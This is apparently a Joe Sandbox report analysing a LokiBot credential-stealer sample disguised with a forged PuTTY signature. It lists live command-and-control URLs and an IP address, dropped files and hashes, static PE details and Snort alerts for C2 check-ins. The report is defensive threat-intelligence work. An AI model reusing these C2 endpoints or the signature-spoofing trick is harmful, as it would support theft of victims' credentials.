Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	22 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SCB#89940578.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://kbfvzoboss.bid/alien/fre.php	100%	URL Reputation	malware
http://alphastand.top/alien/fre.php	100%	URL Reputation	malware
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://alphastand.win/alien/fre.php	100%	URL Reputation	malware
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://alphastand.trade/alien/fre.php	100%	URL Reputation	malware
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	Avira URL Cloud	safe
http://45.77.223.48/~blog/?ajax=posts.php	0%	Avira URL Cloud	safe
http://www.sakkal.comJ	0%	Avira URL Cloud	safe
http://45.77.223.48/~blog/?feed=comments-rss2	0%	Avira URL Cloud	safe
http://45.77.223.48/~blog/index.php?rest_route=/	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/cThe	0%	Avira URL Cloud	safe
http://45.77.223.48/~blog/?ajax=posts.phpJ	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	Avira URL Cloud	safe
http://45.77.223.48/~blog/?feed=rss2	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	Virustotal		Browse
http://www.zhongyicts.com.cn	0%	Avira URL Cloud	safe
http://45.77.223.48/~blog/?ajax=posts.php	0%	Virustotal		Browse
http://45.77.223.48/~blog/index.php?rest_route=/	0%	Virustotal		Browse
http://www.founder.com.cn/cn/cThe	0%	Virustotal		Browse
http://www.founder.com.cn/cn	0%	Virustotal		Browse
http://www.zhongyicts.com.cn	1%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	true	URL Reputation: malware	unknown
http://alphastand.top/alien/fre.php	true	URL Reputation: malware	unknown
http://45.77.223.48/~blog/?ajax=posts.php	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://alphastand.win/alien/fre.php	true	URL Reputation: malware	unknown
http://alphastand.trade/alien/fre.php	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://45.77.223.48/~blog/?feed=comments-rss2	SCB#89940578.exe, 00000002.00000002.2812320964.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, SCB#89940578.exe, 00000002.00000002.2812617875.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/?	SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://45.77.223.48/~blog/index.php?rest_route=/	SCB#89940578.exe, 00000002.00000002.2812320964.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, SCB#89940578.exe, 00000002.00000002.2812617875.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/bThe	SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ibsensoftware.com/	SCB#89940578.exe, SCB#89940578.exe, 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.comJ	SCB#89940578.exe, 00000000.00000002.1708357533.00000000054E0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.w.org/	SCB#89940578.exe, 00000002.00000002.2812320964.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, SCB#89940578.exe, 00000002.00000002.2812617875.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.tiro.com	SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	SCB#89940578.exe	false	URL Reputation: safe	unknown
http://45.77.223.48/~blog/?ajax=posts.phpJ	SCB#89940578.exe, 00000002.00000002.2812221693.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://45.77.223.48/~blog/?feed=rss2	SCB#89940578.exe, 00000002.00000002.2812320964.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, SCB#89940578.exe, 00000002.00000002.2812617875.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.sakkal.com	SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.77.223.48	unknown	United States		20473	AS-CHOOPAUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1431960
Start date and time:	2024-04-26 04:41:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SCB#89940578.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/3@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 67 Number of non-executed functions: 26
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:41:59	API Interceptor	69x Sleep call for process: SCB#89940578.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
45.77.223.48	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	45.77.223.48/~blog/?ajax=ee
45.77.223.48	SCB99440721399.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	45.77.223.48/~blog/?ajax=posts.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-CHOOPAUS	Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	45.77.223.48
	SCB99440721399.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	45.77.223.48
	pikabot_core.bin.exe	Get hash	malicious	PikaBot	Browse	45.32.188.56
	https://i.imgur.com/EoTj4iI.png	Get hash	malicious	Unknown	Browse	155.138.160.21
	https://i.imgur.com/VlAllek.png	Get hash	malicious	Unknown	Browse	155.138.160.21
	shipping document.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	80.240.20.220
	Remittance. #U0440df.html	Get hash	malicious	HTMLPhisher	Browse	45.76.249.237
	NMdpQecbkg.elf	Get hash	malicious	Mirai	Browse	44.40.187.94
	shipping document.vbs	Get hash	malicious	FormBook, GuLoader	Browse	80.240.20.220
	lS9yzwGRef.elf	Get hash	malicious	Mirai	Browse	44.174.121.50

Process:	C:\Users\user\Desktop\SCB#89940578.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Users\user\Desktop\SCB#89940578.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\Desktop\SCB#89940578.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbq:4
MD5:	8CB7B7F28464C3FCBAE8A10C46204572
SHA1:	767FE80969EC2E67F54CC1B6D383C76E7859E2DE
SHA-256:	ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
SHA-512:	9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.951101400475959
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.98% Win32 Executable (generic) a (10002005/4) 49.93% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	SCB#89940578.exe
File size:	706'056 bytes
MD5:	8bdfe306f813ba1a65ecf6e1da4085c1
SHA1:	7bca83400323c71ee5bd1d655004a4a762e1c71b
SHA256:	857fd5543f14e01ea3b08d3aca6ee6763042a48d7b04c9f035a4a37a4d2e0039
SHA512:	d8d8f885f172cac4f47ffeb934f4b2ba076aedbe86851d96e7e410ba18b3ecaa1b9448e87f699de4069909ba5debb34ecd3065465e4aaf2a22106050eccf253d
SSDEEP:	12288:4YqnHvjNIrpf9rN/mc/C/7rFps1mv2XlOZPAgK711pwLKnJLqzLYskR:41PjKr5BNDQ7rF6BOZYgK7OYJLkLS
TLSH:	37E412217378D673C7B05BB444BC94F5ABF5B1912A29E6DD0DE0608E2AF0B80AF15763
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....+f..............0..X...6.......w... ........@.. ....................................@................................

File Icon


Icon Hash:	49598b8999894929

Static PE Info

General

Entrypoint:	0x4a77ae
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x662B08CC [Fri Apr 26 01:52:12 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 00:00:00 08/11/2021 23:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
cmp byte ptr [edi+38h], cl
pop edx
xor eax, 50374856h
xor al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx+42h], al
cmp byte ptr [esp+esi+51h], dl
cmp byte ptr [ecx+4Fh], dl
inc esp
push ebp
inc ebp
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa775c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa8000	0x3204	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xa9000	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xac000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa57d4	0xa5800	6650a153d4aec5b8f828cc245664de56	False	0.9293659129531722	data	7.959447927229037	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xa8000	0x3204	0x3400	05ac60d846e661d7b5ec2666d4610a5d	False	0.8815354567307693	data	7.559708842187755	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xac000	0xc	0x200	d1cfb80115234bf21b56485b3eabc824	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xa80c8	0x2d07	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9655591220612475
RT_GROUP_ICON	0xaade0	0x14	data	1.05
RT_VERSION	0xaae04	0x3fc	data	0.4284313725490196

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/26/24-04:42:41.660723	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49767	80	192.168.2.4	45.77.223.48
04/26/24-04:42:37.043735	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49764	80	192.168.2.4	45.77.223.48
04/26/24-04:43:38.519329	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49804	80	192.168.2.4	45.77.223.48
04/26/24-04:42:41.660723	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49767	80	192.168.2.4	45.77.223.48
04/26/24-04:42:20.116742	TCP	2025381	ET TROJAN LokiBot Checkin	49753	80	192.168.2.4	45.77.223.48
04/26/24-04:42:46.212974	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49770	80	192.168.2.4	45.77.223.48
04/26/24-04:43:21.940707	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49795	80	192.168.2.4	45.77.223.48
04/26/24-04:43:40.002816	TCP	2025381	ET TROJAN LokiBot Checkin	49805	80	192.168.2.4	45.77.223.48
04/26/24-04:43:01.472637	TCP	2025381	ET TROJAN LokiBot Checkin	49781	80	192.168.2.4	45.77.223.48
04/26/24-04:42:43.312556	TCP	2025381	ET TROJAN LokiBot Checkin	49768	80	192.168.2.4	45.77.223.48
04/26/24-04:43:17.632927	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49792	80	192.168.2.4	45.77.223.48
04/26/24-04:42:46.212974	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49770	80	192.168.2.4	45.77.223.48
04/26/24-04:43:21.940707	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49795	80	192.168.2.4	45.77.223.48
04/26/24-04:42:05.836233	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49739	80	192.168.2.4	45.77.223.48
04/26/24-04:43:13.266385	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49789	80	192.168.2.4	45.77.223.48
04/26/24-04:43:08.959356	TCP	2025381	ET TROJAN LokiBot Checkin	49786	80	192.168.2.4	45.77.223.48
04/26/24-04:42:10.160803	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49742	80	192.168.2.4	45.77.223.48
04/26/24-04:42:55.707371	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49777	80	192.168.2.4	45.77.223.48
04/26/24-04:42:12.565966	TCP	2025381	ET TROJAN LokiBot Checkin	49743	80	192.168.2.4	45.77.223.48
04/26/24-04:42:57.146160	TCP	2025381	ET TROJAN LokiBot Checkin	49778	80	192.168.2.4	45.77.223.48
04/26/24-04:42:04.426692	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49736	80	192.168.2.4	45.77.223.48
04/26/24-04:42:10.160803	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49742	80	192.168.2.4	45.77.223.48
04/26/24-04:42:55.707371	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49777	80	192.168.2.4	45.77.223.48
04/26/24-04:42:29.146660	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49759	80	192.168.2.4	45.77.223.48
04/26/24-04:43:02.891159	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49782	80	192.168.2.4	45.77.223.48
04/26/24-04:43:41.435996	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49806	80	192.168.2.4	45.77.223.48
04/26/24-04:42:29.146660	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49759	80	192.168.2.4	45.77.223.48
04/26/24-04:43:16.174844	TCP	2025381	ET TROJAN LokiBot Checkin	49791	80	192.168.2.4	45.77.223.48
04/26/24-04:42:08.768305	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49741	80	192.168.2.4	45.77.223.48
04/26/24-04:42:32.693379	TCP	2025381	ET TROJAN LokiBot Checkin	49761	80	192.168.2.4	45.77.223.48
04/26/24-04:43:23.393350	TCP	2025381	ET TROJAN LokiBot Checkin	49796	80	192.168.2.4	45.77.223.48
04/26/24-04:43:30.595490	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49801	80	192.168.2.4	45.77.223.48
04/26/24-04:43:19.056808	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49793	80	192.168.2.4	45.77.223.48
04/26/24-04:43:10.461205	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49787	80	192.168.2.4	45.77.223.48
04/26/24-04:43:52.043341	TCP	2025381	ET TROJAN LokiBot Checkin	49813	80	192.168.2.4	45.77.223.48
04/26/24-04:43:14.708232	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49790	80	192.168.2.4	45.77.223.48
04/26/24-04:43:05.708325	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49784	80	192.168.2.4	45.77.223.48
04/26/24-04:43:27.753457	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49799	80	192.168.2.4	45.77.223.48
04/26/24-04:43:19.056808	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49793	80	192.168.2.4	45.77.223.48
04/26/24-04:43:42.908989	TCP	2025381	ET TROJAN LokiBot Checkin	49807	80	192.168.2.4	45.77.223.48
04/26/24-04:43:10.461205	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49787	80	192.168.2.4	45.77.223.48
